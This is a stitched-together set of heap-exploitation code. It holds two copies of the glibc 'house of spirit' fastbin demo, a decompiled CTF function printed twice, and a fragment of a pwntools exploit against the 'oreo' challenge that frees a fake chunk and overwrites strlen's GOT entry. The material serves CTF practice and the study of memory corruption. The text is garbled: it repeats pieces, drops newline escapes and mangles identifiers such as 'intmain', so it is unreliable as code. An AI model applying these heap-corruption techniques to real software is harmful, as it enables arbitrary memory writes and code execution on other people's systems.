intmain() { fprintf(stderr, "This file demonstrates the house of spirit attack.\n");
fprintf(stderr, "Calling malloc() once so that it sets up its memory.\n"); malloc(1);
fprintf(stderr, "We will now overwrite a pointer to point to a fake 'fastbin' region.\n"); unsignedlonglong *a; // This has nothing to do with fastbinsY (do not be fooled by the 10) - fake_chunks is just a piece of memory to fulfil allocations (pointed to from fastbinsY) unsignedlonglong fake_chunks[10] __attribute__ ((aligned (16)));
fprintf(stderr, "This region (memory of length: %lu) contains two chunks. The first starts at %p and the second at %p.\n", sizeof(fake_chunks), &fake_chunks[1], &fake_chunks[7]);
fprintf(stderr, "This chunk.size of this region has to be 16 more than the region (to accomodate the chunk data) while still falling into the fastbin category (<= 128 on x64). The PREV_INUSE (lsb) bit is ignored by free for fastbin-sized chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems.\n"); fprintf(stderr, "... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. E.g. on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for the malloc parameter at the end. \n"); fake_chunks[1] = 0x40; // this is the size
fprintf(stderr, "The chunk.size of the *next* fake region has to be sane. That is > 2*SIZE_SZ (> 16 on x64) && < av->system_mem (< 128kb by default for the main arena) to pass the nextsize integrity checks. No need for fastbin size.\n"); // fake_chunks[9] because 0x40 / sizeof(unsigned long long) = 8 fake_chunks[9] = 0x1234; // nextsize
fprintf(stderr, "Now we will overwrite our pointer with the address of the fake region inside the fake first chunk, %p.\n", &fake_chunks[1]); fprintf(stderr, "... note that the memory address of the *region* associated with this chunk must be 16-byte aligned.\n"); a = &fake_chunks[2];
fprintf(stderr, "Freeing the overwritten pointer.\n"); free(a);
fprintf(stderr, "Now the next malloc will return the region of our fake chunk at %p, which will be %p!\n", &fake_chunks[1], &fake_chunks[2]); fprintf(stderr, "malloc(0x30): %p\n", malloc(0x30)); }
#include<stdio.h> #include<stdlib.h> intmain() { printf("This file demonstrates the house of spirit attack.n"); printf("Calling malloc() once so that it sets up its memory.n"); malloc(1); printf("We will now overwrite a pointer to point to a fake 'fastbin' region.n"); unsignedlonglong *a; unsignedlonglong fake_chunks[10] __attribute__ ((aligned (16))); printf("This region must contain two chunks. The first starts at %p and the second at %p.n", &fake_chunks[1], &fake_chunks[7]); printf("This chunk.size of this region has to be 16 more than the region (to accomodate the chunk data) while still falling into the fastbin category (<= 128). The PREV_INUSE (lsb) bit is ignored by free for fastbin-sized chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems.n"); printf("... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. E.g. on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for the malloc parameter at the end. n"); fake_chunks[1] = 0x40; // this is the size printf("The chunk.size of the *next* fake region has be above 2*SIZE_SZ (16 on x64) but below av->system_mem (128kb by default for the main arena) to pass the nextsize integrity checks .n"); fake_chunks[9] = 0x2240; // nextsize printf("Now we will overwrite our pointer with the address of the fake region inside the fake first chunk, %p.n", &fake_chunks[1]); printf("... note that the memory address of the *region* associated with this chunk must be 16-byte aligned.n"); a = &fake_chunks[2]; printf("Freeing the overwritten pointer.n"); free(a); printf("Now the next malloc will return the region of our fake chunk at %p, which will be %p!n", &fake_chunks[1], &fake_chunks[2]); printf("malloc(0x30): %pn", malloc(0x30)); }
v0 = __readgsdword(0x14u); printf("Enter any notice you'd like to submit with your order: "); fgets(message, 128, stdin); // message处有一个指针指向另一块区域,留言的数据在那。如果修改此指针可达到任意写效果。 vul(message); return __readgsdword(0x14u) ^ v0; }
v0 = __readgsdword(0x14u); printf("Enter any notice you'd like to submit with your order: "); fgets(message, 128, stdin); // message处有一个指针指向另一块区域,留言的数据在那。如果修改此指针可达到任意写效果。 vul(message); return __readgsdword(0x14u) ^ v0; }
payload = 'a' * 27 + p32(0x0804a2a8) # set next link=0x0804A2A8, try to free a fake chunk add(25 * 'a', payload) # before free, we need to bypass some check # fake chunk's size is 0x40 # 0x20 *'a' for padding the last fake chunk # 0x40 for fake chunk's next chunk's prev_size # 0x100 for fake chunk's next chunk's size # set fake iofle' next to be NULL payload = 0x24 * '\x00' + 'a' #+ p32(0x60) #payload = payload.ljust(52, 'b') #payload += p32(0) #payload = payload.ljust(128, 'c') message(payload) # fastbin 0x40: 0x0804A2A0->some where heap->NULL #gdb.attach(p) #p.interactive() order() payload = p32(oreo.got['strlen']).ljust(20, 'a') add(payload, 'b' * 20)